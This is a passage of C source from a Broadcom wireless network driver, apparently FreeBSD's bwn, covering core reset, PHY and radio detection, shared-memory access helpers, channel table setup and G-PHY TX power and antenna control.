type (%d)\n", mac->mac_phy.type); error = ENXIO; goto fail; } mac->mac_phy.gmode = have_bg; if (mac->mac_phy.attach != NULL) { error = mac->mac_phy.attach(mac); if (error) { device_printf(sc->sc_dev, "failed\n"); goto fail; } } bwn_reset_core(mac, have_bg ? 
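/*
 * The per-PHY method table (mac_phy.*) was filled in above; only the
 * G and LP PHYs are wired up here, and any other PHY type fails the
 * attach with ENXIO.
 */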
BWN_TGSLOW_SUPPORT_G : 0); error = bwn_chiptest(mac); if (error) goto fail; error = bwn_setup_channels(mac, have_bg, have_a); if (error) { device_printf(sc->sc_dev, "failed to setup channels\n"); goto fail; } if (sc->sc_curmac == NULL) sc->sc_curmac = mac; error = bwn_dma_attach(mac); if (error != 0) { device_printf(sc->sc_dev, "failed to initialize DMA\n"); goto fail; } mac->mac_phy.switch_analog(mac, 0); siba_dev_down(sc->sc_dev, 0); fail: siba_powerdown(sc->sc_dev); return (error); } static void bwn_reset_core(struct bwn_mac *mac, uint32_t flags) { struct bwn_softc *sc = mac->mac_sc; uint32_t low, ctl; flags |= (BWN_TGSLOW_PHYCLOCK_ENABLE | BWN_TGSLOW_PHYRESET); siba_dev_up(sc->sc_dev, flags); DELAY(2000); low = (siba_read_4(sc->sc_dev, SIBA_TGSLOW) | SIBA_TGSLOW_FGC) & ~BWN_TGSLOW_PHYRESET; siba_write_4(sc->sc_dev, SIBA_TGSLOW, low); siba_read_4(sc->sc_dev, SIBA_TGSLOW); DELAY(1000); siba_write_4(sc->sc_dev, SIBA_TGSLOW, low & ~SIBA_TGSLOW_FGC); siba_read_4(sc->sc_dev, SIBA_TGSLOW); DELAY(1000); if (mac->mac_phy.switch_analog != NULL) mac->mac_phy.switch_analog(mac, 1); ctl = BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_GMODE; if (flags & BWN_TGSLOW_SUPPORT_G) ctl |= BWN_MACCTL_GMODE; BWN_WRITE_4(mac, BWN_MACCTL, ctl | BWN_MACCTL_IHR_ON); } static int bwn_phy_getinfo(struct bwn_mac *mac, int tgshigh) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; uint32_t tmp; /* PHY */ tmp = BWN_READ_2(mac, BWN_PHYVER); phy->gmode = (tgshigh & BWN_TGSHIGH_HAVE_2GHZ) ? 1 : 0; phy->rf_on = 1; phy->analog = (tmp & BWN_PHYVER_ANALOG) >> 12; phy->type = (tmp & BWN_PHYVER_TYPE) >> 8; phy->rev = (tmp & BWN_PHYVER_VERSION); if ((phy->type == BWN_PHYTYPE_A && phy->rev >= 4) || (phy->type == BWN_PHYTYPE_B && phy->rev != 2 && phy->rev != 4 && phy->rev != 6 && phy->rev != 7) || (phy->type == BWN_PHYTYPE_G && phy->rev > 9) || (phy->type == BWN_PHYTYPE_N && phy->rev > 4) || (phy->type == BWN_PHYTYPE_LP && phy->rev > 2)) goto unsupphy; /* RADIO */ if (siba_get_chipid(sc->sc_dev) == 0x4317) { if (siba_get_chiprev(sc->sc_dev) == 0) tmp = 0x3205017f; else if (siba_get_chiprev(sc->sc_dev) == 1) tmp = 0x4205017f; else tmp = 0x5205017f; } else { BWN_WRITE_2(mac, BWN_RFCTL, BWN_RFCTL_ID); tmp = BWN_READ_2(mac, BWN_RFDATALO); BWN_WRITE_2(mac, BWN_RFCTL, BWN_RFCTL_ID); tmp |= (uint32_t)BWN_READ_2(mac, BWN_RFDATAHI) << 16; } phy->rf_rev = (tmp & 0xf0000000) >> 28; phy->rf_ver = (tmp & 0x0ffff000) >> 12; phy->rf_manuf = (tmp & 0x00000fff); if (phy->rf_manuf != 0x17f) /* 0x17f is broadcom */ goto unsupradio; if ((phy->type == BWN_PHYTYPE_A && (phy->rf_ver != 0x2060 || phy->rf_rev != 1 || phy->rf_manuf != 0x17f)) || (phy->type == BWN_PHYTYPE_B && (phy->rf_ver & 0xfff0) != 0x2050) || (phy->type == BWN_PHYTYPE_G && phy->rf_ver != 0x2050) || (phy->type == BWN_PHYTYPE_N && phy->rf_ver != 0x2055 && phy->rf_ver != 0x2056) || (phy->type == BWN_PHYTYPE_LP && phy->rf_ver != 0x2062 && phy->rf_ver != 0x2063)) goto unsupradio; return (0); unsupphy: device_printf(sc->sc_dev, "unsupported PHY (type %#x, rev %#x, " "analog %#x)\n", phy->type, phy->rev, phy->analog); return (ENXIO); unsupradio: device_printf(sc->sc_dev, "unsupported radio (manuf %#x, ver %#x, " "rev %#x)\n", phy->rf_manuf, phy->rf_ver, phy->rf_rev); return (ENXIO); } static int bwn_chiptest(struct bwn_mac *mac) { #define TESTVAL0 0x55aaaa55 #define TESTVAL1 0xaa5555aa struct bwn_softc *sc = mac->mac_sc; uint32_t v, backup; BWN_LOCK(sc); backup = bwn_shm_read_4(mac, BWN_SHARED, 0); bwn_shm_write_4(mac, BWN_SHARED, 0, TESTVAL0); if (bwn_shm_read_4(mac, 
BWN_SHARED, 0) != TESTVAL0) goto error; bwn_shm_write_4(mac, BWN_SHARED, 0, TESTVAL1); if (bwn_shm_read_4(mac, BWN_SHARED, 0) != TESTVAL1) goto error; bwn_shm_write_4(mac, BWN_SHARED, 0, backup); if ((siba_get_revid(sc->sc_dev) >= 3) && (siba_get_revid(sc->sc_dev) <= 10)) { BWN_WRITE_2(mac, BWN_TSF_CFP_START, 0xaaaa); BWN_WRITE_4(mac, BWN_TSF_CFP_START, 0xccccbbbb); if (BWN_READ_2(mac, BWN_TSF_CFP_START_LOW) != 0xbbbb) goto error; if (BWN_READ_2(mac, BWN_TSF_CFP_START_HIGH) != 0xcccc) goto error; } BWN_WRITE_4(mac, BWN_TSF_CFP_START, 0); v = BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_GMODE; if (v != (BWN_MACCTL_GMODE | BWN_MACCTL_IHR_ON)) goto error; BWN_UNLOCK(sc); return (0); error: BWN_UNLOCK(sc); device_printf(sc->sc_dev, "failed to validate the chipaccess\n"); return (ENODEV); } #define IEEE80211_CHAN_HTG (IEEE80211_CHAN_HT | IEEE80211_CHAN_G) #define IEEE80211_CHAN_HTA (IEEE80211_CHAN_HT | IEEE80211_CHAN_A) static int bwn_setup_channels(struct bwn_mac *mac, int have_bg, int have_a) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; memset(ic->ic_channels, 0, sizeof(ic->ic_channels)); ic->ic_nchans = 0; if (have_bg) bwn_addchannels(ic->ic_channels, IEEE80211_CHAN_MAX, &ic->ic_nchans, &bwn_chantable_bg, IEEE80211_CHAN_G); if (mac->mac_phy.type == BWN_PHYTYPE_N) { if (have_a) bwn_addchannels(ic->ic_channels, IEEE80211_CHAN_MAX, &ic->ic_nchans, &bwn_chantable_n, IEEE80211_CHAN_HTA); } else { if (have_a) bwn_addchannels(ic->ic_channels, IEEE80211_CHAN_MAX, &ic->ic_nchans, &bwn_chantable_a, IEEE80211_CHAN_A); } mac->mac_phy.supports_2ghz = have_bg; mac->mac_phy.supports_5ghz = have_a; return (ic->ic_nchans == 0 ? ENXIO : 0); } static uint32_t bwn_shm_read_4(struct bwn_mac *mac, uint16_t way, uint16_t offset) { uint32_t ret; BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); ret = BWN_READ_2(mac, BWN_SHM_DATA_UNALIGNED); ret <<= 16; bwn_shm_ctlword(mac, way, (offset >> 2) + 1); ret |= BWN_READ_2(mac, BWN_SHM_DATA); goto out; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); ret = BWN_READ_4(mac, BWN_SHM_DATA); out: return (ret); } static uint16_t bwn_shm_read_2(struct bwn_mac *mac, uint16_t way, uint16_t offset) { uint16_t ret; BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); ret = BWN_READ_2(mac, BWN_SHM_DATA_UNALIGNED); goto out; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); ret = BWN_READ_2(mac, BWN_SHM_DATA); out: return (ret); } static void bwn_shm_ctlword(struct bwn_mac *mac, uint16_t way, uint16_t offset) { uint32_t control; control = way; control <<= 16; control |= offset; BWN_WRITE_4(mac, BWN_SHM_CONTROL, control); } static void bwn_shm_write_4(struct bwn_mac *mac, uint16_t way, uint16_t offset, uint32_t value) { BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); BWN_WRITE_2(mac, BWN_SHM_DATA_UNALIGNED, (value >> 16) & 0xffff); bwn_shm_ctlword(mac, way, (offset >> 2) + 1); BWN_WRITE_2(mac, BWN_SHM_DATA, value & 0xffff); return; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); BWN_WRITE_4(mac, BWN_SHM_DATA, value); } static void bwn_shm_write_2(struct bwn_mac *mac, uint16_t way, uint16_t offset, uint16_t 
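/*
 * Shared-memory access scheme used by these helpers: a control word of
 * the form (way << 16 | offset) is written to BWN_SHM_CONTROL and the
 * data is then moved through BWN_SHM_DATA.  For BWN_SHARED the offset
 * is a byte offset that must be 2-byte aligned and is converted to a
 * 32-bit word offset; accesses that are not 4-byte aligned are split
 * into two 16-bit transfers via BWN_SHM_DATA_UNALIGNED and BWN_SHM_DATA.
 */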
value) { BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); BWN_WRITE_2(mac, BWN_SHM_DATA_UNALIGNED, value); return; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); BWN_WRITE_2(mac, BWN_SHM_DATA, value); } static void bwn_addchan(struct ieee80211_channel *c, int freq, int flags, int ieee, int txpow) { c->ic_freq = freq; c->ic_flags = flags; c->ic_ieee = ieee; c->ic_minpower = 0; c->ic_maxpower = 2 * txpow; c->ic_maxregpower = txpow; } static void bwn_addchannels(struct ieee80211_channel chans[], int maxchans, int *nchans, const struct bwn_channelinfo *ci, int flags) { struct ieee80211_channel *c; int i; c = &chans[*nchans]; for (i = 0; i < ci->nchannels; i++) { const struct bwn_channel *hc; hc = &ci->channels[i]; if (*nchans >= maxchans) break; bwn_addchan(c, hc->freq, flags, hc->ieee, hc->maxTxPow); c++, (*nchans)++; if (flags == IEEE80211_CHAN_G || flags == IEEE80211_CHAN_HTG) { /* g channel have a separate b-only entry */ if (*nchans >= maxchans) break; c[0] = c[-1]; c[-1].ic_flags = IEEE80211_CHAN_B; c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTG) { /* HT g channel have a separate g-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_G; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTA) { /* HT a channel have a separate a-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_A; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } } } static int bwn_phy_g_attach(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; unsigned int i; int16_t pab0, pab1, pab2; static int8_t bwn_phy_g_tssi2dbm_table[] = BWN_PHY_G_TSSI2DBM_TABLE; int8_t bg; bg = (int8_t)siba_sprom_get_tssi_bg(sc->sc_dev); pab0 = (int16_t)siba_sprom_get_pa0b0(sc->sc_dev); pab1 = (int16_t)siba_sprom_get_pa0b1(sc->sc_dev); pab2 = (int16_t)siba_sprom_get_pa0b2(sc->sc_dev); if ((siba_get_chipid(sc->sc_dev) == 0x4301) && (phy->rf_ver != 0x2050)) device_printf(sc->sc_dev, "not supported anymore\n"); pg->pg_flags = 0; if (pab0 == 0 || pab1 == 0 || pab2 == 0 || pab0 == -1 || pab1 == -1 || pab2 == -1) { pg->pg_idletssi = 52; pg->pg_tssi2dbm = bwn_phy_g_tssi2dbm_table; return (0); } pg->pg_idletssi = (bg == 0 || bg == -1) ? 
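/*
 * The 64-entry TSSI-to-dBm table built below is derived from the SPROM
 * PA coefficients (pa0b0..pa0b2) by a small fixed-point iteration that
 * gives up if it fails to converge; when the coefficients are missing,
 * the static default table above is used instead.
 */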
62 : bg; pg->pg_tssi2dbm = (uint8_t *)malloc(64, M_DEVBUF, M_NOWAIT | M_ZERO); if (pg->pg_tssi2dbm == NULL) { device_printf(sc->sc_dev, "failed to allocate buffer\n"); return (ENOMEM); } for (i = 0; i < 64; i++) { int32_t m1, m2, f, q, delta; int8_t j = 0; m1 = BWN_TSSI2DBM(16 * pab0 + i * pab1, 32); m2 = MAX(BWN_TSSI2DBM(32768 + i * pab2, 256), 1); f = 256; do { if (j > 15) { device_printf(sc->sc_dev, "failed to generate tssi2dBm\n"); free(pg->pg_tssi2dbm, M_DEVBUF); return (ENOMEM); } q = BWN_TSSI2DBM(f * 4096 - BWN_TSSI2DBM(m2 * f, 16) * f, 2048); delta = abs(q - f); f = q; j++; } while (delta >= 2); pg->pg_tssi2dbm[i] = MIN(MAX(BWN_TSSI2DBM(m1 * f, 8192), -127), 128); } pg->pg_flags |= BWN_PHY_G_FLAG_TSSITABLE_ALLOC; return (0); } static void bwn_phy_g_detach(struct bwn_mac *mac) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; if (pg->pg_flags & BWN_PHY_G_FLAG_TSSITABLE_ALLOC) { free(pg->pg_tssi2dbm, M_DEVBUF); pg->pg_tssi2dbm = NULL; } pg->pg_flags = 0; } static void bwn_phy_g_init_pre(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; void *tssi2dbm; int idletssi; unsigned int i; tssi2dbm = pg->pg_tssi2dbm; idletssi = pg->pg_idletssi; memset(pg, 0, sizeof(*pg)); pg->pg_tssi2dbm = tssi2dbm; pg->pg_idletssi = idletssi; memset(pg->pg_minlowsig, 0xff, sizeof(pg->pg_minlowsig)); for (i = 0; i < N(pg->pg_nrssi); i++) pg->pg_nrssi[i] = -1000; for (i = 0; i < N(pg->pg_nrssi_lt); i++) pg->pg_nrssi_lt[i] = i; pg->pg_lofcal = 0xffff; pg->pg_initval = 0xffff; pg->pg_immode = BWN_IMMODE_NONE; pg->pg_ofdmtab_dir = BWN_OFDMTAB_DIR_UNKNOWN; pg->pg_avgtssi = 0xff; pg->pg_loctl.tx_bias = 0xff; TAILQ_INIT(&pg->pg_loctl.calib_list); } static int bwn_phy_g_prepare_hw(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; static const struct bwn_rfatt rfatt0[] = { { 3, 0 }, { 1, 0 }, { 5, 0 }, { 7, 0 }, { 9, 0 }, { 2, 0 }, { 0, 0 }, { 4, 0 }, { 6, 0 }, { 8, 0 }, { 1, 1 }, { 2, 1 }, { 3, 1 }, { 4, 1 } }; static const struct bwn_rfatt rfatt1[] = { { 2, 1 }, { 4, 1 }, { 6, 1 }, { 8, 1 }, { 10, 1 }, { 12, 1 }, { 14, 1 } }; static const struct bwn_rfatt rfatt2[] = { { 0, 1 }, { 2, 1 }, { 4, 1 }, { 6, 1 }, { 8, 1 }, { 9, 1 }, { 9, 1 } }; static const struct bwn_bbatt bbatt_0[] = { { 0 }, { 1 }, { 2 }, { 3 }, { 4 }, { 5 }, { 6 }, { 7 }, { 8 } }; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); if (phy->rf_ver == 0x2050 && phy->rf_rev < 6) pg->pg_bbatt.att = 0; else pg->pg_bbatt.att = 2; /* prepare Radio Attenuation */ pg->pg_rfatt.padmix = 0; if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G) { if (siba_get_pci_revid(sc->sc_dev) < 0x43) { pg->pg_rfatt.att = 2; goto done; } else if (siba_get_pci_revid(sc->sc_dev) < 0x51) { pg->pg_rfatt.att = 3; goto done; } } if (phy->type == BWN_PHYTYPE_A) { pg->pg_rfatt.att = 0x60; goto done; } switch (phy->rf_ver) { case 0x2050: switch (phy->rf_rev) { case 0: pg->pg_rfatt.att = 5; goto done; case 1: if (phy->type == BWN_PHYTYPE_G) { if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G && siba_get_pci_revid(sc->sc_dev) >= 30) pg->pg_rfatt.att = 3; else if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306) pg->pg_rfatt.att = 3; else pg->pg_rfatt.att = 1; } else { if 
(siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G && siba_get_pci_revid(sc->sc_dev) >= 30) pg->pg_rfatt.att = 7; else pg->pg_rfatt.att = 6; } goto done; case 2: if (phy->type == BWN_PHYTYPE_G) { if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G && siba_get_pci_revid(sc->sc_dev) >= 30) pg->pg_rfatt.att = 3; else if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306) pg->pg_rfatt.att = 5; else if (siba_get_chipid(sc->sc_dev) == 0x4320) pg->pg_rfatt.att = 4; else pg->pg_rfatt.att = 3; } else pg->pg_rfatt.att = 6; goto done; case 3: pg->pg_rfatt.att = 5; goto done; case 4: case 5: pg->pg_rfatt.att = 1; goto done; case 6: case 7: pg->pg_rfatt.att = 5; goto done; case 8: pg->pg_rfatt.att = 0xa; pg->pg_rfatt.padmix = 1; goto done; case 9: default: pg->pg_rfatt.att = 5; goto done; } break; case 0x2053: switch (phy->rf_rev) { case 1: pg->pg_rfatt.att = 6; goto done; } break; } pg->pg_rfatt.att = 5; done: pg->pg_txctl = (bwn_phy_g_txctl(mac) << 4); if (!bwn_has_hwpctl(mac)) { lo->rfatt.array = rfatt0; lo->rfatt.len = N(rfatt0); lo->rfatt.min = 0; lo->rfatt.max = 9; goto genbbatt; } if (phy->rf_ver == 0x2050 && phy->rf_rev == 8) { lo->rfatt.array = rfatt1; lo->rfatt.len = N(rfatt1); lo->rfatt.min = 0; lo->rfatt.max = 14; goto genbbatt; } lo->rfatt.array = rfatt2; lo->rfatt.len = N(rfatt2); lo->rfatt.min = 0; lo->rfatt.max = 9; genbbatt: lo->bbatt.array = bbatt_0; lo->bbatt.len = N(bbatt_0); lo->bbatt.min = 0; lo->bbatt.max = 8; BWN_READ_4(mac, BWN_MACCTL); if (phy->rev == 1) { phy->gmode = 0; bwn_reset_core(mac, 0); bwn_phy_g_init_sub(mac); phy->gmode = 1; bwn_reset_core(mac, BWN_TGSLOW_SUPPORT_G); } return (0); } static uint16_t bwn_phy_g_txctl(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; if (phy->rf_ver != 0x2050) return (0); if (phy->rf_rev == 1) return (BWN_TXCTL_PA2DB | BWN_TXCTL_TXMIX); if (phy->rf_rev < 6) return (BWN_TXCTL_PA2DB); if (phy->rf_rev == 8) return (BWN_TXCTL_TXMIX); return (0); } static int bwn_phy_g_init(struct bwn_mac *mac) { bwn_phy_g_init_sub(mac); return (0); } static void bwn_phy_g_exit(struct bwn_mac *mac) { struct bwn_txpwr_loctl *lo = &mac->mac_phy.phy_g.pg_loctl; struct bwn_lo_calib *cal, *tmp; if (lo == NULL) return; TAILQ_FOREACH_SAFE(cal, &lo->calib_list, list, tmp) { TAILQ_REMOVE(&lo->calib_list, cal, list); free(cal, M_DEVBUF); } } static uint16_t bwn_phy_g_read(struct bwn_mac *mac, uint16_t reg) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); return (BWN_READ_2(mac, BWN_PHYDATA)); } static void bwn_phy_g_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); BWN_WRITE_2(mac, BWN_PHYDATA, value); } static uint16_t bwn_phy_g_rf_read(struct bwn_mac *mac, uint16_t reg) { KASSERT(reg != 1, ("%s:%d: fail", __func__, __LINE__)); BWN_WRITE_2(mac, BWN_RFCTL, reg | 0x80); return (BWN_READ_2(mac, BWN_RFDATALO)); } static void bwn_phy_g_rf_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { KASSERT(reg != 1, ("%s:%d: fail", __func__, __LINE__)); BWN_WRITE_2(mac, BWN_RFCTL, reg); BWN_WRITE_2(mac, BWN_RFDATALO, value); } static int bwn_phy_g_hwpctl(struct bwn_mac *mac) { return (mac->mac_phy.rev >= 6); } static void bwn_phy_g_rf_onoff(struct bwn_mac *mac, int on) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; unsigned int channel; uint16_t rfover, rfoverval; if (on) { if (phy->rf_on) return; 
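/*
 * Powering the radio back on restores the RF override registers saved
 * by the "off" path below (RFOVER/RFOVERVAL) and bounces through
 * channel 6 to force a clean retune of the current channel; powering it
 * off saves that context first and then forces the override bits used
 * to disable the RF.
 */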
BWN_PHY_WRITE(mac, 0x15, 0x8000); BWN_PHY_WRITE(mac, 0x15, 0xcc00); BWN_PHY_WRITE(mac, 0x15, (phy->gmode ? 0xc0 : 0x0)); if (pg->pg_flags & BWN_PHY_G_FLAG_RADIOCTX_VALID) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, pg->pg_radioctx_over); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, pg->pg_radioctx_overval); pg->pg_flags &= ~BWN_PHY_G_FLAG_RADIOCTX_VALID; } channel = phy->chan; bwn_phy_g_switch_chan(mac, 6, 1); bwn_phy_g_switch_chan(mac, channel, 0); return; } rfover = BWN_PHY_READ(mac, BWN_PHY_RFOVER); rfoverval = BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); pg->pg_radioctx_over = rfover; pg->pg_radioctx_overval = rfoverval; pg->pg_flags |= BWN_PHY_G_FLAG_RADIOCTX_VALID; BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, rfover | 0x008c); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfoverval & 0xff73); } static int bwn_phy_g_switch_channel(struct bwn_mac *mac, uint32_t newchan) { if ((newchan < 1) || (newchan > 14)) return (EINVAL); bwn_phy_g_switch_chan(mac, newchan, 0); return (0); } static uint32_t bwn_phy_g_get_default_chan(struct bwn_mac *mac) { return (1); } static void bwn_phy_g_set_antenna(struct bwn_mac *mac, int antenna) { struct bwn_phy *phy = &mac->mac_phy; uint64_t hf; int autodiv = 0; uint16_t tmp; if (antenna == BWN_ANTAUTO0 || antenna == BWN_ANTAUTO1) autodiv = 1; hf = bwn_hf_read(mac) & ~BWN_HF_UCODE_ANTDIV_HELPER; bwn_hf_write(mac, hf); BWN_PHY_WRITE(mac, BWN_PHY_BBANDCFG, (BWN_PHY_READ(mac, BWN_PHY_BBANDCFG) & ~BWN_PHY_BBANDCFG_RXANT) | ((autodiv ? BWN_ANTAUTO1 : antenna) << BWN_PHY_BBANDCFG_RXANT_SHIFT)); if (autodiv) { tmp = BWN_PHY_READ(mac, BWN_PHY_ANTDWELL); if (antenna == BWN_ANTAUTO1) tmp &= ~BWN_PHY_ANTDWELL_AUTODIV1; else tmp |= BWN_PHY_ANTDWELL_AUTODIV1; BWN_PHY_WRITE(mac, BWN_PHY_ANTDWELL, tmp); } tmp = BWN_PHY_READ(mac, BWN_PHY_ANTWRSETT); if (autodiv) tmp |= BWN_PHY_ANTWRSETT_ARXDIV; else tmp &= ~BWN_PHY_ANTWRSETT_ARXDIV; BWN_PHY_WRITE(mac, BWN_PHY_ANTWRSETT, tmp); if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_OFDM61, BWN_PHY_READ(mac, BWN_PHY_OFDM61) | BWN_PHY_OFDM61_10); BWN_PHY_WRITE(mac, BWN_PHY_DIVSRCHGAINBACK, (BWN_PHY_READ(mac, BWN_PHY_DIVSRCHGAINBACK) & 0xff00) | 0x15); if (phy->rev == 2) BWN_PHY_WRITE(mac, BWN_PHY_ADIVRELATED, 8); else BWN_PHY_WRITE(mac, BWN_PHY_ADIVRELATED, (BWN_PHY_READ(mac, BWN_PHY_ADIVRELATED) & 0xff00) | 8); } if (phy->rev >= 6) BWN_PHY_WRITE(mac, BWN_PHY_OFDM9B, 0xdc); hf |= BWN_HF_UCODE_ANTDIV_HELPER; bwn_hf_write(mac, hf); } static int bwn_phy_g_im(struct bwn_mac *mac, int mode) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s: fail", __func__)); KASSERT(mode == BWN_IMMODE_NONE, ("%s: fail", __func__)); if (phy->rev == 0 || !phy->gmode) return (ENODEV); pg->pg_aci_wlan_automatic = 0; return (0); } static int bwn_phy_g_recalc_txpwr(struct bwn_mac *mac, int ignore_tssi) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; unsigned int tssi; int cck, ofdm; int power; int rfatt, bbatt; unsigned int max; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s: fail", __func__)); cck = bwn_phy_shm_tssi_read(mac, BWN_SHARED_TSSI_CCK); ofdm = bwn_phy_shm_tssi_read(mac, BWN_SHARED_TSSI_OFDM_G); if (cck < 0 && ofdm < 0) { if (ignore_tssi == 0) return (BWN_TXPWR_RES_DONE); cck = 0; ofdm = 0; } tssi = (cck < 0) ? ofdm : ((ofdm < 0) ? 
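/*
 * TX power recalculation: the CCK and OFDM TSSI readings are merged
 * here (and smoothed against the previous average), translated to dBm
 * through pg_tssi2dbm, and the difference from the requested power is
 * converted into radio/baseband attenuation deltas that
 * bwn_phy_g_set_txpwr() applies later.
 */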
cck : (cck + ofdm) / 2); if (pg->pg_avgtssi != 0xff) tssi = (tssi + pg->pg_avgtssi) / 2; pg->pg_avgtssi = tssi; KASSERT(tssi < BWN_TSSI_MAX, ("%s:%d: fail", __func__, __LINE__)); max = siba_sprom_get_maxpwr_bg(sc->sc_dev); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) max -= 3; if (max >= 120) { device_printf(sc->sc_dev, "invalid max TX-power value\n"); max = 80; siba_sprom_set_maxpwr_bg(sc->sc_dev, max); } power = MIN(MAX((phy->txpower < 0) ? 0 : (phy->txpower << 2), 0), max) - (pg->pg_tssi2dbm[MIN(MAX(pg->pg_idletssi - pg->pg_curtssi + tssi, 0x00), 0x3f)]); if (power == 0) return (BWN_TXPWR_RES_DONE); rfatt = -((power + 7) / 8); bbatt = (-(power / 2)) - (4 * rfatt); if ((rfatt == 0) && (bbatt == 0)) return (BWN_TXPWR_RES_DONE); pg->pg_bbatt_delta = bbatt; pg->pg_rfatt_delta = rfatt; return (BWN_TXPWR_RES_NEED_ADJUST); } static void bwn_phy_g_set_txpwr(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; int rfatt, bbatt; uint8_t txctl; bwn_mac_suspend(mac); BWN_ASSERT_LOCKED(sc); bbatt = pg->pg_bbatt.att; bbatt += pg->pg_bbatt_delta; rfatt = pg->pg_rfatt.att; rfatt += pg->pg_rfatt_delta; bwn_phy_g_setatt(mac, &bbatt, &rfatt); txctl = pg->pg_txctl; if ((phy->rf_ver == 0x2050) && (phy->rf_rev == 2)) { if (rfatt <= 1) { if (txctl == 0) { txctl = BWN_TXCTL_PA2DB | BWN_TXCTL_TXMIX; rfatt += 2; bbatt += 2; } else if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) { bbatt += 4 * (rfatt - 2); rfatt = 2; } } else if (rfatt > 4 && txctl) { txctl = 0; if (bbatt < 3) { rfatt -= 3; bbatt += 2; } else { rfatt -= 2; bbatt -= 2; } } } pg->pg_txctl = txctl; bwn_phy_g_setatt(mac, &bbatt, &rfatt); pg->pg_rfatt.att = rfatt; pg->pg_bbatt.att = bbatt; DPRINTF(sc, BWN_DEBUG_TXPOW, "%s: adjust TX power\n", __func__); bwn_phy_lock(mac); bwn_rf_lock(mac); bwn_phy_g_set_txpwr_sub(mac, &pg->pg_bbatt, &pg->pg_rfatt, pg->pg_txctl); bwn_rf_unlock(mac); bwn_phy_unlock(mac); bwn_mac_enable(mac); } static void bwn_phy_g_task_15s(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; unsigned long expire, now; 